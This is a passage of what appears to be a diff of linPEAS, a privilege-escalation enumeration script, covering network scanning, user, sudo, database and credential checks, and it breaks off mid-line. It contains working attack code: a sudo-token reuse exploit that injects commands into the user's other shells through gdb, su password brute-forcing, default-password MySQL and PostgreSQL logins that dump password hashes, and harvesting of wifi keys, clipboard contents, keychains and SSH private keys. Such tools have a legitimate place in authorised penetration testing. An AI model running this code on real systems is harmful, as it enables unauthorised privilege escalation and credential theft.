genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - - #TODO: identify allows in context="default" - done - done - fi - echo "" - - print_2title "D-Bus Service Objects list" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - dbuslist=$(busctl list 2>/dev/null) - if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," - fi - fi - done - else echo_not_found "busctl" - fi - echo "" - echo "" - - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Net; then - ########################################### - #---------) Network Information (---------# - ########################################### - print_title "Network Information" - - if [ "$MACOS" ]; then - print_2title "Network Capabilities" - warn_exec system_profiler SPNetworkDataType - echo "" - fi - - #-- NI) Hostname, hosts and DNS - print_2title "Hostname, hosts and DNS" - cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - warn_exec dnsdomainname 2>/dev/null - echo "" - - #-- NI) /etc/inetd.conf - print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" - echo "" - - #-- NI) Interfaces - print_2title "Interfaces" - cat /etc/networks 2>/dev/null - (ifconfig || ip a) 2>/dev/null - echo "" - - #-- NI) Neighbours - print_2title "Networks and neighbours" - if [ "$MACOS" ]; then - netstat -rn 2>/dev/null - else - (route || ip n || cat /proc/net/route) 2>/dev/null - fi - (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Firewall status" - warn_exec system_profiler SPFirewallDataType - fi - - #-- NI) Iptables - print_2title "Iptables rules" - (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" - echo "" - - #-- NI) Ports - print_2title "Active Ports" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," - echo "" - - #-- NI) MacOS hardware ports - if [ "$MACPEAS" ]; then - print_2title "Hardware Ports" - networksetup -listallhardwareports - echo "" - - print_2title "VLANs" - networksetup -listVLANs - echo "" - - print_2title "Wifi Info" - networksetup -getinfo Wi-Fi - echo "" - - print_2title "Check Enabled Proxies" - scutil --proxy - echo "" - - print_2title "Wifi Proxy URL" - networksetup -getautoproxyurl Wi-Fi - echo "" - - print_2title "Wifi Web Proxy" - networksetup -getwebproxy Wi-Fi - echo "" - - print_2title "Wifi FTP Proxy" - networksetup -getftpproxy Wi-Fi - echo "" - fi - - #-- NI) tcpdump - print_2title "Can I sniff with tcpdump?" - timeout 1 tcpdump >/dev/null 2>&1 - if [ $? -eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - print_2title "Internet Access?" - check_tcp_80 2>/dev/null & - check_tcp_443 2>/dev/null & - check_icmp 2>/dev/null & - check_dns 2>/dev/null & - wait - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then - if ! [ "$FOUND_NC" ]; then - printf $RED"[-] $SCAN_BAN_BAD\n$NC" - echo "The network is not going to be scanned..." - - else - print_2title "Scanning local networks (using /24)" - - if ! [ "$PING" ] && ![ "$FPING" ]; then - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" - fi - - select_nc - local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") - printf "%s\n" "$local_ips" | while read local_ip; do - if ! [ -z "$local_ip" ]; then - print_3title "Discovering hosts in $local_ip/24" - - if [ "$PING" ] || [ "$FPING" ]; then - discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp - fi - - discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp - - sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips - rm $Wfolder/.ips.tmp 2>/dev/null - - while read disc_ip; do - me="" - if [ "$disc_ip" = "$local_ip" ]; then - me=" (local)" - fi - - echo "Scanning top ports of ${disc_ip}${me}" - (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null - echo "" - done < $Wfolder/.ips - - rm $Wfolder/.ips 2>/dev/null - echo "" - fi - done - fi - fi - - if [ "$MACOS" ]; then - print_2title "Any MacOS Sharing Service Enabled?" - rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); - scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); - flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); - rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); - rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); - bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); - printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; - echo "" - print_2title "VPN Creds" - system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," - echo "" - - print_2title "Bluetooth Info" - warn_exec system_profiler SPBluetoothDataType - echo "" - - print_2title "Ethernet Info" - warn_exec system_profiler SPEthernetDataType - echo "" - - print_2title "USB Info" - warn_exec system_profiler SPUSBDataType - echo "" - - #Irrelevant to PE - #print_2title "Airport Info" - #warn_exec system_profiler SPAirPortDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q UsrI; then - ########################################### - #----------) Users Information (----------# - ########################################### - print_title "Users Information" - - #-- UI) My user - print_2title "My user" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "" - - if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" - defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - echo "" - - print_2title "All Login and Logout hooks" - defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist - echo "" - - print_2title "Keychains" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" - security list-keychains - echo "" - - print_2title "SystemKey" - ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then - echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - echo "" - fi - - #-- UI) PGP keys? - print_2title "Do I have PGP keys?" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" - echo "" - - #-- UI) Clipboard and highlighted text - print_2title "Clipboard or highlighted text?" - if [ "$(command -v xclip 2>/dev/null)" ]; then - echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v xsel 2>/dev/null)" ]; then - echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v pbpaste 2>/dev/null)" ]; then - echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - else echo_not_found "xsel and xclip" - fi - echo "" - - #-- UI) Sudo -l - print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" - if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" - fi - ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" - if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - for filename in '/etc/sudoers.d/*'; do - if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," - fi - done - echo "" - - #-- UI) Sudo tokens - print_2title "Checking sudo tokens" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; - fi - is_gdb="$(command -v gdb 2>/dev/null)" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; - else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; - fi - if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... (try again later?)" - fi - fi - echo "" - - #-- UI) Doas - print_2title "Checking doas.conf" - doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) - if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then - cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," - else echo_not_found "doas.conf" - fi - echo "" - - #-- UI) Pkexec policy - print_2title "Checking Pkexec policy" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" - echo "" - - #-- UI) Superusers - print_2title "Superusers" - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Users with console - print_2title "Users with console" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - else - no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) - unexpected_shells="" - printf "%s\n" "$no_shells" | while read f; do - if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then - unexpected_shells="$f\n$unexpected_shells" - fi - done - grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - if [ "$unexpected_shells" ]; then - printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" - echo "Unexpected users with shells:" - printf "%s\n" "$unexpected_shells" | while read f; do - if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" - fi - done - fi - fi - echo "" - - #-- UI) All users & groups - print_2title "All users & groups" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - fi - echo "" - - #-- UI) Login now - print_2title "Login now" - (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Last logons - print_2title "Last logons" - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Login info - print_2title "Last time logon each user" - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - - EXISTS_FINGER="$(command -v finger 2>/dev/null)" - if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - fi - echo "" - - #-- UI) Password policy - print_2title "Password policy" - grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Relevant last user info and user configs" - defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null - echo "" - - print_2title "Guest user status" - sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - echo "" - fi - - #-- UI) Brute su - EXISTS_SUDO="$(command -v sudo 2>/dev/null)" - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - POSSIBE_SU_BRUTE=$(check_if_su_brute); - if [ "$POSSIBE_SU_BRUTE" ]; then - SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) - printf "%s\n" "$SHELLUSERS" | while read u; do - echo " Bruteforcing user $u..." - su_brute_user_num "$u" $PASSTRY - done - else - printf $GREEN"It's not possible to brute-force su.\n\n"$NC - fi - else - print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC - fi - print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q SofI; then - ########################################### - #--------) Software Information (---------# - ########################################### - print_title "Software Information" - - #-- SI) Mysql version - print_2title "MySQL version" - mysql --version 2>/dev/null || echo_not_found "mysql" - echo "" - - #-- SI) Mysql connection root/root - print_list "MySQL connection using default root/root ........... " - mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - #-- SI) Mysql connection root/toor - print_list "MySQL connection using root/toor ................... " - mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - #-- SI) Mysql connection root/NOPASS - mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) - print_list "MySQL connection using root/NOPASS ................. " - if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - #-- SI) Mysql credentials - print_2title "Searching mysql credentials and exec" - if [ "$PSTORAGE_MYSQL" ]; then - printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in $(find $d -name debian.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," - cat "$f" - fi - done - for f in $(find $d -name user.MYD 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" - fi - done - for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do - if [ -r "$f" ]; then - u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - fi - done - for f in $(find $d -name my.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "Found readable $f" - grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," - fi - done - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") - if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," - fi - done - else echo_not_found - fi - echo "" - - peass{MariaDB} - - peass{PostgreSQL} - - #-- SI) PostgreSQL brute - if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. - #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - fi - - peass{Mongo} - - peass{Apache} - - peass{Tomcat} - - peass{FastCGI} - - peass{Http_conf} - - peass{Htpasswd} - - peass{PHP Sessions} - - peass{Wordpress} - - peass{Drupal} - - peass{Moodle} - - peass{Supervisord} - - peass{Cesi} - - peass{Rsync} - - peass{Hostapd} - - #-- SI) Wifi conns - print_2title "Searching wifi conns file" - wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) - if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done - else echo_not_found - fi - echo "" - - peass{Anaconda ks} - - peass{VNC} - - peass{Ldap} - - peass{OpenVPN} - - #-- SI) ssh files - print_2title "Searching ssl/ssh files" - if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi - sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" - hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" - hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - - peass{SSH} - - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," - - if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* 